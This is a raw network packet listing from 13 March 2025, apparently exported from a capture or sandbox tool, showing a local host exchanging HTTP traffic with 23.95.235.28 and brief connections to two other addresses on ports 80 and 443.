Mar 13, 2025 01:18:55.821109056 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821151972 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821151972 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821362972 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821377993 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821393013 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821410894 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821413040 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821429014 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821619987 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821630955 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821643114 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821652889 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821672916 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821681023 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821681023 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821681023 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821685076 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821698904 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821710110 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821721077 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821734905 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821748018 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821748972 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821748972 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821748972 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821816921 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821816921 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.823915958 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.823929071 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.823945045 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.823957920 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.823971987 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824009895 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824009895 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824040890 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824698925 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824717999 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824731112 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824750900 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824758053 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824760914 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824768066 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824771881 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824784040 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824798107 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824809074 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824810982 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824810982 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824820995 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824835062 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824841976 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824856043 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824867010 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824882984 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824887037 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824887037 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824896097 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824908018 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824918032 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824928999 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824929953 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824929953 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824932098 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824944973 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824955940 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824969053 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824970007 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.824980021 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824991941 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.824994087 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825002909 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825015068 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825027943 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825046062 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825048923 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825050116 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825057030 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825071096 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825071096 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825078964 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825089931 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825102091 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825108051 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825114965 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825131893 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825145006 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825158119 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825158119 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825158119 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825158119 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825170994 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825185061 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825193882 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825193882 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825197935 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825208902 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825222969 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825231075 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825239897 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825251102 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825263023 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825264931 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825265884 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.825275898 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825288057 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.825300932 CET  80           49694      23.95.235.28   192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825304985 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825313091 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825339079 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825339079 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825366020 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825366020 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825716019 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825732946 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825743914 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825757027 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825771093 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825782061 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825793982 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825802088 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825802088 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825802088 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825807095 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825819969 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825830936 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825841904 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825855970 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825869083 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825872898 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825872898 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825872898 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825884104 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825896978 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825901985 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825908899 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825921059 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.825934887 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825957060 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.825957060 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.865792990 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.865801096 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.865803003 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.865865946 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.865868092 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.865883112 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.865888119 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.865916967 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.866035938 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.866558075 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.866568089 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.866617918 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907202959 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907222986 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907303095 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907303095 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907418013 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907449961 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907463074 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907495975 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907533884 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907612085 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907625914 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907636881 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907649040 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907651901 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907680035 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907712936 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907834053 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907865047 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907880068 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907891989 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907906055 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907917023 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.907938004 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907938004 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.907958984 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908010006 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908160925 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908171892 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908184052 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908198118 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908207893 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908220053 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908231020 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908231020 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908231974 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908243895 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908252001 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908257961 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908272982 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908313036 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908313036 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908605099 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908617973 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908629894 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908643007 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908653975 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908664942 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908689976 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908777952 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908792019 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908838987 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908948898 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908963919 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908974886 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908986092 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.908987045 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.908998966 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909008026 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909010887 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909022093 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909024000 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909035921 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909035921 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909048080 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909070015 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909073114 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909075022 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909080029 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909095049 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909095049 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909127951 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909749985 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909763098 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909775019 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909790039 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909794092 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909801960 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909813881 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909831047 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909842968 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909843922 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909853935 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909861088 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909868956 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909883022 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909895897 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909904003 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909904003 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909908056 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909920931 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909929991 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909933090 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909945011 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909956932 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.909956932 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909956932 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.909970045 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910001993 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.910041094 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.910659075 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910670042 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910681963 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910693884 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910706043 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910717964 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910728931 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910731077 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.910732031 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.910741091 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910753012 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910767078 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.910800934 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.910800934 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.910800934 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911232948 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911243916 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911262035 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911278009 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911282063 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911282063 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911283970 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911298037 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911303997 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911314964 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911317110 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911328077 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911340952 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911355972 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911366940 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911366940 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911370039 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911382914 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911395073 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911407948 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911421061 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911427021 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911427021 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.911432028 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911444902 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911457062 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.911482096 CET4969480192.168.2.623.95.235.28
Mar 13, 2025 01:18:55.911482096 CET | 49694 | 80 | 192.168.2.6 | 23.95.235.28
Mar 13, 2025 01:18:55.911503077 CET | 49694 | 80 | 192.168.2.6 | 23.95.235.28
Mar 13, 2025 01:18:55.912130117 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912147045 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912161112 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912175894 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912178993 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912184000 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912189007 CET | 49694 | 80 | 192.168.2.6 | 23.95.235.28
Mar 13, 2025 01:18:55.912189960 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912204981 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912218094 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:18:55.912223101 CET | 49694 | 80 | 192.168.2.6 | 23.95.235.28
Mar 13, 2025 01:18:55.912249088 CET | 49694 | 80 | 192.168.2.6 | 23.95.235.28
Mar 13, 2025 01:18:55.912286997 CET | 49694 | 80 | 192.168.2.6 | 23.95.235.28
Mar 13, 2025 01:19:00.122756958 CET | 80 | 49694 | 23.95.235.28 | 192.168.2.6
Mar 13, 2025 01:19:00.122874975 CET | 49694 | 80 | 192.168.2.6 | 23.95.235.28
Mar 13, 2025 01:19:02.366164923 CET | 49695 | 80 | 192.168.2.6 | 158.101.44.242
Mar 13, 2025 01:19:02.370951891 CET | 80 | 49695 | 158.101.44.242 | 192.168.2.6
Mar 13, 2025 01:19:02.373928070 CET | 49695 | 80 | 192.168.2.6 | 158.101.44.242
Mar 13, 2025 01:19:02.374370098 CET | 49695 | 80 | 192.168.2.6 | 158.101.44.242
Mar 13, 2025 01:19:02.379065037 CET | 80 | 49695 | 158.101.44.242 | 192.168.2.6
Mar 13, 2025 01:19:02.946003914 CET | 80 | 49695 | 158.101.44.242 | 192.168.2.6
Mar 13, 2025 01:19:02.952109098 CET | 49695 | 80 | 192.168.2.6 | 158.101.44.242
Mar 13, 2025 01:19:02.956824064 CET | 80 | 49695 | 158.101.44.242 | 192.168.2.6
Mar 13, 2025 01:19:03.131881952 CET | 80 | 49695 | 158.101.44.242 | 192.168.2.6
Mar 13, 2025 01:19:03.144999981 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:19:03.145037889 CET | 443 | 49696 | 104.21.80.1 | 192.168.2.6
Mar 13, 2025 01:19:03.145137072 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:19:03.154239893 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:19:03.154263973 CET | 443 | 49696 | 104.21.80.1 | 192.168.2.6
Mar 13, 2025 01:19:03.185770988 CET | 49695 | 80 | 192.168.2.6 | 158.101.44.242
Mar 13, 2025 01:19:03.191435099 CET | 49694 | 80 | 192.168.2.6 | 23.95.235.28
Mar 13, 2025 01:19:05.372046947 CET | 443 | 49696 | 104.21.80.1 | 192.168.2.6
Mar 13, 2025 01:19:05.372116089 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:19:05.381350040 CET | 49696 | 443 | 192.168.2.6 | 104.21.80.1
Mar 13, 2025 01:19:05.381366968 CET | 443 | 49696 | 104.21.80.1 | 192.168.2.6
